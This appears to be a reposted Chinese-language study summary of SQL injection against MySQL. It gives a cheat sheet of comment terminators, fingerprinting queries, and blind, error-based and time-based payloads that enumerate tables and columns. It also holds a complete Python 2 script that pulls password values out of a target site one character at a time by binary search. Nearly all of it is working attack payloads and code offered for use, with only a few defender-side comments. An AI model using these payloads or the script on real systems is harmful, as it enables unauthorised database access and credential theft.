sql注入學習小結
阿新 • • 發佈:2019-01-10
sql注入小結
尾部處理小結
# |
---|
/* |
;%00 |
基礎資訊獲取小結
- sql版本資訊
AND MID(VERSION(),1,1) = ‘5’
還有一種在網上看到的大牛獲取版本資訊的方法（利用 MySQL 版本條件註釋，語句能否執行取決於伺服器版本）
1 /!50094eaea/; False - version is equal to or greater than 5.00.94
1 /!50096eaea/; True - version is less than 5.00.96
1 /!50095eaea/; False - version is equal to 5.00.95
- 主機名
SELECT @@hostname
- 當前資料庫名,使用者名稱
select database(),user()
tips:可以用到的一些小技巧:
多個數據group_concat()或者concat()直接爆出來
資料庫資訊獲取(盲注)
- 資料庫數量
and (select count(schema_name) from information_schema limit 0,1)>=0
指定資料庫中表猜解
- AND SELECT SUBSTR(table_name,1,1) FROM information_schema.tables > ‘A’
- and ascii(substr((select table_name from information_schema.tables where table_schema=%s limit %d,1),%d,1))>%d 資料庫名需要hex形式
- 基於錯誤回顯的直接蕩了
AND(SELECT COUNT(*) FROM (SELECT 1 UNION SELECT null UNION SELECT !1)x GROUP BY CONCAT((SELECT table_name FROM information_schema.tables LIMIT 1),FLOOR(RAND(0)*2)))
(@:=1)||@ GROUP BY CONCAT((SELECT table_name FROM information_schema.tables LIMIT 1),[email protected]) HAVING @||MIN(@:=0);
表中列數猜解
- and ascii(substr((select table_name from information_schema.tables where table_schema=0x123456 and table_name=0x123456limit %d,1),%d,1))>0
- AND(SELECT COUNT(*) FROM (SELECT 1 UNION SELECT null UNION SELECT !1)x GROUP BY CONCAT((SELECT column_name FROM information_schema.columns LIMIT 1),FLOOR(RAND(0)*2)))
(@:=1)||@ GROUP BY CONCAT((SELECT column_name FROM information_schema.columns LIMIT 1),[email protected]) HAVING @||MIN(@:=0);
具體資料猜解
and ascii(substr((select password from XXX.super_user_info limit %d,1),%d,1))>%d
# -*-coding:utf-8-*-
import urllib2
import urllib
import string
import time
# Base URL of the page under test; the "XXX" segments are placeholders the
# author blanked out. The injection point is the numeric `id` query parameter,
# which is why a typed/parameterized `id` on the server side removes the issue.
testpayload="http://XXX.XXX.XX/XXX.php?id=14"
# Boolean condition appended to `id`: true when the ASCII code of character %d
# of row %d of the password column is greater than %d (slots: row, offset, threshold).
payload2=" and ascii(substr((select password from XXXX.XXXXXXX limit %d,1),%d,1))>%d"
# Same shape, but walks column names from information_schema.columns; the schema
# and table names are expected as hex literals (0x...), see the note on the blind
# payload earlier in the page.
payload=" and ascii(substr((select column_name from information_schema.columns where table_schema=0xXXXXXXXX and table_name=0xXXXXXXXXXX limit %d,1),%d,1))>%d"
def GetTableName(payload,i,j,k):
    """Send one probe request and report whether the response matched.

    payload -- format string with three %d slots (row, character offset, threshold)
    i, j, k -- the values substituted into those slots, in that order
    Returns True when the marker paragraph is found in the response body at an
    index greater than zero, False otherwise (a match at index 0 also yields False).
    The name is historical: the helper is used with whichever payload is passed in.
    """
    # URL-encode the injected condition; "&up_id=1" is presumably a second
    # parameter the page expects -- its role is not visible here.
    finalurl = testpayload + urllib.quote(payload % (i,j,k)) + "&up_id=1"
    res = urllib2.urlopen(finalurl).read()
    # Boolean oracle: presence of this specific paragraph markup separates a
    # "true" page from a "false" one. From the defender's side every call is a
    # GET to the same path whose only variation is three numeric literals inside
    # `id`, which is what makes this traffic pattern stand out in access logs.
    temp = res.find("<p class=\"MsoNormal\" style=\"margin-left:0pt;text-indent:24pt;text-align:left;\">")
    if temp > 0:
        return True
    else:
        return False
def main():
    """Recover up to 100 rows one character at a time through the boolean oracle.

    For each row i the characters are found by binary search over ASCII 1..127
    using payload2; the per-row loop ends when the probe "ascii(char) > 0" fails
    (substr() past the end of the value yields '' whose ascii() is 0).
    Prints each character as it is found, then the whole string for the row.
    """
    for i in xrange(0, 100):
        num = str(i)  # unused
        charnum = 1  # 1-based character offset within the current row's value
        tmp = ''  # characters recovered so far for this row
        # Probes row 0 rather than row i: an up-front check that a first row exists.
        if GetTableName(payload2, 0, charnum, 0) == False:
            break
        while (1):
            # Search bounds. Invariant kept by the probes below: ascii(char) > left
            # is true and ascii(char) > right is taken to be false.
            left = 0
            right = 127
            mid = (left + right) / 2
            # "ascii(char) > 0" false means no character at this offset: row is done.
            if GetTableName(payload2,i,charnum,0) == False:
                break
            while left < right - 1:
                # The probe tests ascii(char) > mid.
                if GetTableName(payload2,i,charnum,mid) == True:
                    # ascii(char) > mid: raise the lower bound
                    left = mid
                    mid = (left + right) / 2
                else:
                    # ascii(char) <= mid: lower the upper bound
                    right = mid
                    # recompute the midpoint
                    mid = (left + right) / 2
            # Loop exits with right == left + 1, so the code is exactly left + 1.
            print chr(left + 1)
            tmp += chr(left + 1)
            charnum += 1
        # Label is left over from the column-name payload; with payload2 the
        # string printed here is a value from the password column.
        print "column name:" + tmp
main()  # runs on import as well as on direct execution: there is no __main__ guard
一些小技巧
SELECT CONCAT('a', 'd', 'm', 'i', 'n');
SELECT CONCAT_WS('', 'a', 'd', 'm', 'i', 'n');
SELECT GROUP_CONCAT('a', 'd', 'm', 'i', 'n');
有關基於時間盲注的函式
SLEEP() MySQL 5
BENCHMARK() MySQL 4/5
example:’ - (IF(MID(version(),1,1) LIKE 5, BENCHMARK(100000,SHA1(‘true’)), false)) - ‘